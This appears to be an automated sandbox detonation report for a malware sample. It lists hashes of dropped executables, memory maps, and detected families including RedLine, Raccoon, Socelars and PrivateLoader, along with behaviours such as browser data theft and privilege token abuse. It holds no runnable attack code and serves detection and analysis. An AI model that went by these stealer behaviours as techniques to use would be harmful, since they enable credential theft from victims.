SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1922ecc1aaabd2.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1922ecc1aaabd2.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b1a112f2.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b6650547.exe

MD5 3e1cd5a1acf5ce17029d6aa9642ed115
SHA1 858af14318e1811a4d64646a6e062fd42a114ea8
SHA256 a988b93159c8e60e09f6458324885813af93e624429dcf99ac5b852e44ab99e5
SHA512 25204d025f730086dc5c2c64e935a750f232f8157559a0e0bcecdd721bc6398d393ba615dd227a41ddeac1cbac2586464c309acf760172e293f2355b4ecd1473

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue196c8dc8316d5e.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19c43a743a35.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

memory/1380-124-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1922ecc1aaabd2.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/240-119-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

memory/1028-148-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19581adec51f.exe

MD5 83552f70e7791687013e0b6e77eef7f4
SHA1 ae6e0e3f2873dd234b4813d4c6a47364111dec8a
SHA256 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84
SHA512 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9

memory/964-155-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b1a112f2.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b1a112f2.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

memory/1000-150-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

memory/1320-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

memory/1552-157-0x0000000000000000-mapping.dmp

memory/1596-160-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

memory/1144-175-0x0000000000000000-mapping.dmp

memory/1624-184-0x0000000000000000-mapping.dmp

memory/1756-187-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19896d3ece3b4.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1984208f692605cf.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/1784-180-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue199b79a9228e.exe

MD5 0b67130e7f04d08c78cb659f54b20432
SHA1 669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256 bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA512 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19ad8dd95e905.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

memory/708-189-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19581adec51f.exe

MD5 83552f70e7791687013e0b6e77eef7f4
SHA1 ae6e0e3f2873dd234b4813d4c6a47364111dec8a
SHA256 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84
SHA512 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19581adec51f.exe

MD5 83552f70e7791687013e0b6e77eef7f4
SHA1 ae6e0e3f2873dd234b4813d4c6a47364111dec8a
SHA256 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84
SHA512 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19de85da9de6.exe

MD5 0c4602580c43df3321e55647c7c7dfdb
SHA1 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1
SHA256 fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752
SHA512 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11

memory/1452-171-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue1984208f692605cf.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19b1a112f2.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

memory/1160-169-0x0000000000000000-mapping.dmp

memory/1428-164-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zSC735351C\Tue19862f0a4c.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

memory/1708-192-0x0000000000000000-mapping.dmp

memory/1876-194-0x0000000000000000-mapping.dmp

memory/708-197-0x0000000001040000-0x0000000001048000-memory.dmp

memory/1708-198-0x00000000008D0000-0x0000000000940000-memory.dmp

memory/952-199-0x0000000001380000-0x00000000013F0000-memory.dmp

memory/1428-200-0x00000000002D0000-0x00000000002E8000-memory.dmp

memory/1700-201-0x0000000000000000-mapping.dmp

memory/1520-202-0x0000000000000000-mapping.dmp

memory/1924-204-0x00000000730D0000-0x000000007367B000-memory.dmp

memory/1920-205-0x00000000730D0000-0x000000007367B000-memory.dmp

memory/1596-206-0x0000000001B20000-0x0000000001BAE000-memory.dmp

memory/1596-207-0x0000000000400000-0x00000000016FB000-memory.dmp

memory/2056-208-0x0000000000000000-mapping.dmp

memory/1596-209-0x0000000000340000-0x000000000038F000-memory.dmp

memory/1428-211-0x00000000002A0000-0x00000000002A6000-memory.dmp

memory/2148-213-0x0000000000000000-mapping.dmp

memory/2136-212-0x0000000000000000-mapping.dmp

memory/2188-216-0x0000000000000000-mapping.dmp

memory/1924-218-0x00000000730D0000-0x000000007367B000-memory.dmp

memory/1920-219-0x00000000730D0000-0x000000007367B000-memory.dmp

memory/2236-220-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2248-223-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2236-222-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2248-227-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2236-226-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2236-228-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2236-232-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2236-234-0x000000000041B23E-mapping.dmp

memory/2248-233-0x000000000041B23E-mapping.dmp

memory/2248-231-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2248-230-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2364-229-0x0000000000000000-mapping.dmp

memory/2236-238-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2248-237-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2236-244-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2552-245-0x0000000000000000-mapping.dmp

memory/1260-247-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1596-248-0x0000000000340000-0x000000000038F000-memory.dmp

memory/2716-249-0x0000000000000000-mapping.dmp

memory/2772-251-0x0000000000000000-mapping.dmp

memory/2784-252-0x0000000000000000-mapping.dmp

memory/2808-255-0x0000000000000000-mapping.dmp

memory/2808-258-0x00000000024A0000-0x000000000254C000-memory.dmp

memory/2808-259-0x0000000002600000-0x00000000026AB000-memory.dmp

memory/792-260-0x00000000030D0000-0x00000000030D9000-memory.dmp

memory/792-261-0x0000000000250000-0x0000000000259000-memory.dmp

memory/792-262-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/792-263-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/2172-264-0x0000000000000000-mapping.dmp

memory/2284-266-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-06 18:11

Reported

2022-08-06 18:13

Platform

win10v2004-20220721-en

Max time kernel

142s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe"

Signatures

OnlyLogger

loader onlylogger

PrivateLoader

loader privateloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

Raccoon

stealer raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Socelars

stealer socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1922ecc1aaabd2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1967b2731eea4d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19862f0a4c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1984208f692605cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19ad8dd95e905.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19581adec51f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GDFKB.tmp\Tue19c43a743a35.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue199b79a9228e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19de85da9de6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-GDFKB.tmp\Tue19c43a743a35.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A
File created C:\Program Files (x86)\FarLabUninstaller\is-LAOEC.tmp C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A
File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19862f0a4c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19de85da9de6.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
